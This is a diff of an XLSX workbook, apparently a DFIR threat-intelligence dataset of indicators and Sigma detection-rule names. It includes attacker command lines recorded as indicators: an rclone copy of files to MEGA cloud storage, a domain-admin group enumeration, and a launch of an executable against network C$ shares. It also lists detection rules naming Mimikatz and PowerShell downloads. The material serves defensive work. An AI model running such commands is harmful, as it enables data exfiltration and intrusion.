-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E64" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F64" s="1" t="s">
-        <v>73</v>
-      </c>
-      <c r="G64" s="1"/>
-    </row>
-    <row r="65" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>69</v>
+      </c>
+      <c r="F64" s="1"/>
+      <c r="G64" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="65" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A65" s="1" t="s">
-        <v>162</v>
+        <v>158</v>
       </c>
       <c r="B65" s="1"/>
       <c r="C65" s="1"/>
       <c r="D65" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E65" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F65" s="1" t="s">
-        <v>74</v>
-      </c>
-      <c r="G65" s="1"/>
-    </row>
-    <row r="66" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>70</v>
+      </c>
+      <c r="F65" s="1"/>
+      <c r="G65" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="66" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A66" s="1" t="s">
-        <v>163</v>
+        <v>159</v>
       </c>
       <c r="B66" s="1"/>
       <c r="C66" s="1"/>
       <c r="D66" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E66" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F66" s="1" t="s">
-        <v>75</v>
-      </c>
-      <c r="G66" s="1"/>
-    </row>
-    <row r="67" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>71</v>
+      </c>
+      <c r="F66" s="1"/>
+      <c r="G66" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="67" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A67" s="1" t="s">
-        <v>164</v>
+        <v>160</v>
       </c>
       <c r="B67" s="1"/>
       <c r="C67" s="1"/>
       <c r="D67" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E67" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F67" s="1" t="s">
-        <v>76</v>
-      </c>
-      <c r="G67" s="1"/>
-    </row>
-    <row r="68" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>72</v>
+      </c>
+      <c r="F67" s="1"/>
+      <c r="G67" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="68" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A68" s="1" t="s">
-        <v>165</v>
+        <v>161</v>
       </c>
       <c r="B68" s="1"/>
       <c r="C68" s="1"/>
       <c r="D68" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E68" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F68" s="1" t="s">
-        <v>77</v>
-      </c>
-      <c r="G68" s="1"/>
-    </row>
-    <row r="69" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>73</v>
+      </c>
+      <c r="F68" s="1"/>
+      <c r="G68" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="69" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A69" s="1" t="s">
-        <v>166</v>
+        <v>162</v>
       </c>
       <c r="B69" s="1"/>
       <c r="C69" s="1"/>
       <c r="D69" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E69" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F69" s="1" t="s">
-        <v>78</v>
-      </c>
-      <c r="G69" s="1"/>
-    </row>
-    <row r="70" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>74</v>
+      </c>
+      <c r="F69" s="1"/>
+      <c r="G69" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="70" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A70" s="1" t="s">
-        <v>167</v>
+        <v>163</v>
       </c>
       <c r="B70" s="1"/>
       <c r="C70" s="1"/>
       <c r="D70" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E70" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F70" s="1" t="s">
-        <v>79</v>
-      </c>
-      <c r="G70" s="1"/>
-    </row>
-    <row r="71" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>75</v>
+      </c>
+      <c r="F70" s="1"/>
+      <c r="G70" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="71" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A71" s="1" t="s">
-        <v>168</v>
+        <v>164</v>
       </c>
       <c r="B71" s="1"/>
       <c r="C71" s="1"/>
       <c r="D71" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E71" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F71" s="1" t="s">
-        <v>80</v>
-      </c>
-      <c r="G71" s="1"/>
-    </row>
-    <row r="72" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>76</v>
+      </c>
+      <c r="F71" s="1"/>
+      <c r="G71" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="72" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A72" s="1" t="s">
-        <v>169</v>
+        <v>165</v>
       </c>
       <c r="B72" s="1"/>
       <c r="C72" s="1"/>
       <c r="D72" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E72" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F72" s="1" t="s">
-        <v>81</v>
-      </c>
-      <c r="G72" s="1"/>
-    </row>
-    <row r="73" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>77</v>
+      </c>
+      <c r="F72" s="1"/>
+      <c r="G72" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="73" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A73" s="1" t="s">
-        <v>170</v>
+        <v>166</v>
       </c>
       <c r="B73" s="1"/>
       <c r="C73" s="1"/>
       <c r="D73" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E73" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F73" s="1" t="s">
-        <v>82</v>
-      </c>
-      <c r="G73" s="1"/>
-    </row>
-    <row r="74" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>78</v>
+      </c>
+      <c r="F73" s="1"/>
+      <c r="G73" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="74" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A74" s="1" t="s">
-        <v>171</v>
+        <v>167</v>
       </c>
       <c r="B74" s="1"/>
       <c r="C74" s="1"/>
       <c r="D74" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E74" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F74" s="1" t="s">
-        <v>83</v>
-      </c>
-      <c r="G74" s="1"/>
-    </row>
-    <row r="75" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>79</v>
+      </c>
+      <c r="F74" s="1"/>
+      <c r="G74" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="75" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A75" s="1" t="s">
-        <v>172</v>
+        <v>168</v>
       </c>
       <c r="B75" s="1"/>
       <c r="C75" s="1"/>
       <c r="D75" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E75" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F75" s="1" t="s">
-        <v>84</v>
-      </c>
-      <c r="G75" s="1"/>
-    </row>
-    <row r="76" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>80</v>
+      </c>
+      <c r="F75" s="1"/>
+      <c r="G75" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="76" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A76" s="1" t="s">
-        <v>173</v>
+        <v>169</v>
       </c>
       <c r="B76" s="1"/>
       <c r="C76" s="1"/>
       <c r="D76" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E76" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F76" s="1" t="s">
-        <v>85</v>
-      </c>
-      <c r="G76" s="1"/>
-    </row>
-    <row r="77" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>81</v>
+      </c>
+      <c r="F76" s="1"/>
+      <c r="G76" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="77" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A77" s="1" t="s">
-        <v>174</v>
+        <v>170</v>
       </c>
       <c r="B77" s="1"/>
       <c r="C77" s="1"/>
       <c r="D77" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E77" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F77" s="1" t="s">
-        <v>86</v>
-      </c>
-      <c r="G77" s="1"/>
-    </row>
-    <row r="78" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>82</v>
+      </c>
+      <c r="F77" s="1"/>
+      <c r="G77" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="78" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A78" s="1" t="s">
-        <v>175</v>
+        <v>171</v>
       </c>
       <c r="B78" s="1"/>
       <c r="C78" s="1"/>
       <c r="D78" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E78" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F78" s="1" t="s">
-        <v>87</v>
-      </c>
-      <c r="G78" s="1"/>
-    </row>
-    <row r="79" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>83</v>
+      </c>
+      <c r="F78" s="1"/>
+      <c r="G78" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="79" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A79" s="1" t="s">
-        <v>176</v>
+        <v>172</v>
       </c>
       <c r="B79" s="1"/>
       <c r="C79" s="1"/>
       <c r="D79" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E79" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F79" s="1" t="s">
-        <v>88</v>
-      </c>
-      <c r="G79" s="1"/>
-    </row>
-    <row r="80" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>84</v>
+      </c>
+      <c r="F79" s="1"/>
+      <c r="G79" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="80" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A80" s="1" t="s">
-        <v>177</v>
+        <v>173</v>
       </c>
       <c r="B80" s="1"/>
       <c r="C80" s="1"/>
       <c r="D80" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E80" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F80" s="1" t="s">
-        <v>89</v>
-      </c>
-      <c r="G80" s="1"/>
-    </row>
-    <row r="81" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>85</v>
+      </c>
+      <c r="F80" s="1"/>
+      <c r="G80" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="81" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A81" s="1" t="s">
-        <v>178</v>
+        <v>174</v>
       </c>
       <c r="B81" s="1"/>
       <c r="C81" s="1"/>
       <c r="D81" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E81" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F81" s="1" t="s">
-        <v>90</v>
-      </c>
-      <c r="G81" s="1"/>
-    </row>
-    <row r="82" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>86</v>
+      </c>
+      <c r="F81" s="1"/>
+      <c r="G81" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="82" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A82" s="1" t="s">
-        <v>179</v>
+        <v>175</v>
       </c>
       <c r="B82" s="1"/>
       <c r="C82" s="1"/>
       <c r="D82" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E82" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F82" s="1" t="s">
-        <v>91</v>
-      </c>
-      <c r="G82" s="1"/>
-    </row>
-    <row r="83" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>87</v>
+      </c>
+      <c r="F82" s="1"/>
+      <c r="G82" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="83" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A83" s="1" t="s">
-        <v>180</v>
+        <v>176</v>
       </c>
       <c r="B83" s="1"/>
       <c r="C83" s="1"/>
       <c r="D83" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E83" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F83" s="1" t="s">
-        <v>92</v>
-      </c>
-      <c r="G83" s="1"/>
-    </row>
-    <row r="84" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>88</v>
+      </c>
+      <c r="F83" s="1"/>
+      <c r="G83" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="84" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A84" s="1" t="s">
-        <v>181</v>
+        <v>177</v>
       </c>
       <c r="B84" s="1"/>
       <c r="C84" s="1"/>
       <c r="D84" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E84" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F84" s="1" t="s">
-        <v>93</v>
-      </c>
-      <c r="G84" s="1"/>
-    </row>
-    <row r="85" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>89</v>
+      </c>
+      <c r="F84" s="1"/>
+      <c r="G84" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="85" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A85" s="1" t="s">
-        <v>182</v>
+        <v>178</v>
       </c>
       <c r="B85" s="1"/>
       <c r="C85" s="1"/>
       <c r="D85" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E85" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F85" s="1" t="s">
-        <v>94</v>
-      </c>
-      <c r="G85" s="1"/>
-    </row>
-    <row r="86" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>90</v>
+      </c>
+      <c r="F85" s="1"/>
+      <c r="G85" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="86" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A86" s="1" t="s">
-        <v>183</v>
+        <v>179</v>
       </c>
       <c r="B86" s="1"/>
       <c r="C86" s="1"/>
       <c r="D86" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E86" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F86" s="1" t="s">
-        <v>95</v>
-      </c>
-      <c r="G86" s="1"/>
-    </row>
-    <row r="87" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>91</v>
+      </c>
+      <c r="F86" s="1"/>
+      <c r="G86" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="87" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A87" s="1" t="s">
-        <v>184</v>
+        <v>180</v>
       </c>
       <c r="B87" s="1"/>
       <c r="C87" s="1"/>
       <c r="D87" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E87" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F87" s="1" t="s">
-        <v>96</v>
-      </c>
-      <c r="G87" s="1"/>
-    </row>
-    <row r="88" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>92</v>
+      </c>
+      <c r="F87" s="1"/>
+      <c r="G87" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="88" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A88" s="1" t="s">
-        <v>185</v>
+        <v>181</v>
       </c>
       <c r="B88" s="1"/>
       <c r="C88" s="1"/>
       <c r="D88" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E88" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F88" s="1" t="s">
-        <v>97</v>
-      </c>
-      <c r="G88" s="1"/>
-    </row>
-    <row r="89" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>93</v>
+      </c>
+      <c r="F88" s="1"/>
+      <c r="G88" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="89" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A89" s="1" t="s">
-        <v>186</v>
+        <v>182</v>
       </c>
       <c r="B89" s="1"/>
       <c r="C89" s="1"/>
       <c r="D89" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E89" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F89" s="1" t="s">
-        <v>98</v>
-      </c>
-      <c r="G89" s="1"/>
-    </row>
-    <row r="90" spans="1:7" ht="51" x14ac:dyDescent="0.2">
+        <v>94</v>
+      </c>
+      <c r="F89" s="1"/>
+      <c r="G89" s="1" t="s">
+        <v>2</v>
+      </c>
+    </row>
+    <row r="90" spans="1:7" ht="17" x14ac:dyDescent="0.2">
       <c r="A90" s="1" t="s">
-        <v>187</v>
+        <v>183</v>
       </c>
       <c r="B90" s="1"/>
       <c r="C90" s="1"/>
       <c r="D90" s="1" t="s">
-        <v>7</v>
+        <v>190</v>
       </c>
       <c r="E90" s="1" t="s">
-        <v>5</v>
-      </c>
-      <c r="F90" s="1" t="s">
-        <v>99</v>
-      </c>
-      <c r="G90" s="1"/>
+        <v>95</v>
+      </c>
+      <c r="F90" s="1"/>
+      <c r="G90" s="1" t="s">
+        <v>2</v>
+      </c>
     </row>
   </sheetData>
   <phoneticPr fontId="1" type="noConversion"/>

--- a/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
@@ -8,14 +8,14 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{0A2509B4-AD68-014C-8FAA-24A324E75838}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7D87B54B-448E-1641-B1AA-F3B86165E213}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="160" yWindow="-20940" windowWidth="38080" windowHeight="20800" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
   </sheets>
-  <calcPr calcId="181029"/>
+  <calcPr calcId="191029"/>
   <extLst>
     <ext xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}">
       <x15:workbookPr chartTrackingRefBase="1"/>
@@ -1035,8 +1035,8 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{CADA5849-2682-F643-8842-EFF560F6FB5C}">
   <dimension ref="A1:G90"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="F1" workbookViewId="0">
-      <selection activeCell="H3" sqref="H3"/>
+    <sheetView tabSelected="1" workbookViewId="0">
+      <selection activeCell="E8" sqref="E8"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>

--- a/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
+++ b/delta2/lib_e/dfir_osir/dfir_20250224.xlsx
@@ -8,9 +8,9 @@
       <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/GithubProjects/h2w-delta/delta2/lib_e/dfir_osir/"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7D87B54B-448E-1641-B1AA-F3B86165E213}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{BD80D512-49F7-4E4C-BFF5-39AF2960BCFA}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
-    <workbookView xWindow="0" yWindow="-21100" windowWidth="38400" windowHeight="21100" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
+    <workbookView xWindow="0" yWindow="-21100" windowWidth="38080" windowHeight="20780" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
   </bookViews>
   <sheets>
     <sheet name="sheet1" sheetId="1" r:id="rId1"/>
@@ -36,7 +36,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="389" uniqueCount="192">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="450" uniqueCount="260">
   <si>
     <t>eid</t>
   </si>
@@ -179,9 +179,6 @@
     <t>{"process_command_line": "net group \"domain admins\" .domain", "device_type": "domain controller"}</t>
   </si>
   <si>
-    <t>{"process_command_line": "rclone --config=rclone.conf copy c:\fs mega:FTP"}</t>
-  </si>
-  <si>
     <t>{"http_post": "/template/aui/text-inline.vm HTTP/1.1", "http_user_agent": "rclone/v1.64.2", "http_host": "&lt;random&gt;.userstorage.mega.co.nz"}</t>
   </si>
   <si>
@@ -209,123 +206,6 @@
     <t>{"process_command_line": "start cmd /k \"C:\temp\LBB.exe -path \"\\&lt;host&gt;\C$"}</t>
   </si>
   <si>
-    <t>{"sigma_uuid": "cd951fdc-4b2f-47f5-ba99-a33bf61e3770", "sigma_rule_name": "Always Install Elevated Windows Installer"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "e32d4572-9826-4738-b651-95fa63747e8a", "sigma_rule_name": "Base64 Encoded PowerShell Command Detected"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "7d9263bd-dc47-4a58-bc92-5474abab390c", "sigma_rule_name": "Change Winevt Channel Access Permission Via Registry"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "sigma_rule_name": "Disable Windows Event Logging Via Registry"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", "sigma_rule_name": "Disabled Windows Defender Eventlog"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "61065c72-5d7d-44ef-bf41-6a36684b545f", "sigma_rule_name": "Elevated System Shell Spawned"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "98767d61-b2e8-4d71-b661-e36783ee24c1", "sigma_rule_name": "Gzip Archive Decode Via PowerShell"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "sigma_rule_name": "HackTool - Mimikatz Execution"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "502b42de-4306-40b4-9596-6f590c81f073", "sigma_rule_name": "Local Accounts Discovery"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "sigma_rule_name": "Malicious Base64 Encoded PowerShell Keywords in Command Lines"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "183e7ea8-ac4b-4c23-9aec-b3dac4e401ac", "sigma_rule_name": "Net.EXE Execution"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "cd219ff3-fa99-45d4-8380-a7d15116c6dc", "sigma_rule_name": "New User Created Via Net.EXE"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "f4bbd493-b796-416e-bbf2-121235348529", "sigma_rule_name": "Non Interactive PowerShell Process Spawned"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "d679950c-abb7-43a6-80fb-2a480c4fc450", "sigma_rule_name": "PDQ Deploy Remote Adminstartion Tool Execution"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", "sigma_rule_name": "Potential PowerShell Command Line Obfuscation"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "sigma_rule_name": "Potentially Suspicious CMD Shell Output Redirect"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "sigma_rule_name": "PowerShell Base64 Encoded FromBase64String Cmdlet"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "sigma_rule_name": "PowerShell Download Pattern"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "6e897651-f157-4d8f-aaeb-df8151488385", "sigma_rule_name": "PowerShell Web Download"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", "sigma_rule_name": "Process Terminated Via Taskkill"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "b52e84a3-029e-4529-b09b-71d19dd27e94", "sigma_rule_name": "Remote Access Tool - AnyDesk Execution"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "b98d0db6-511d-45de-ad02-e82a98729620", "sigma_rule_name": "Remotely Hosted HTA File Executed Via Mshta.EXE"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "2aa0a6b4-a865-495b-ab51-c28249537b75", "sigma_rule_name": "Startup Folder File Write"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "88872991-7445-4a22-90b2-a3adadb0e827", "sigma_rule_name": "Stop Windows Service Via Net.EXE"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "590a5f4c-6c8c-4f10-8307-89afe9453a9d", "sigma_rule_name": "Suspicious Child Process Created as System"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "sigma_rule_name": "Suspicious Execution of Hostname"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "fb843269-508c-4b76-8b8d-88679db22ce7", "sigma_rule_name": "Suspicious Execution of Powershell with Base64"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "5cb299fc-5fb1-4d07-b989-0644c68b6043", "sigma_rule_name": "Suspicious File Download From IP Via Curl.EXE"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "sigma_rule_name": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "03cc0c25-389f-4bf8-b48d-11878079f1ca", "sigma_rule_name": "Suspicious MSHTA Child Process"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", "sigma_rule_name": "Suspicious PowerShell Parent Process"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "sigma_rule_name": "Suspicious SYSTEM User Process Creation"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", "sigma_rule_name": "Suspicious Tasklist Discovery Command"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", "sigma_rule_name": "Suspicious Windows Service Tampering"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", "sigma_rule_name": "Unusually Long PowerShell CommandLine"}</t>
-  </si>
-  <si>
-    <t>{"sigma_uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "sigma_rule_name": "Whoami Utility Execution"}</t>
-  </si>
-  <si>
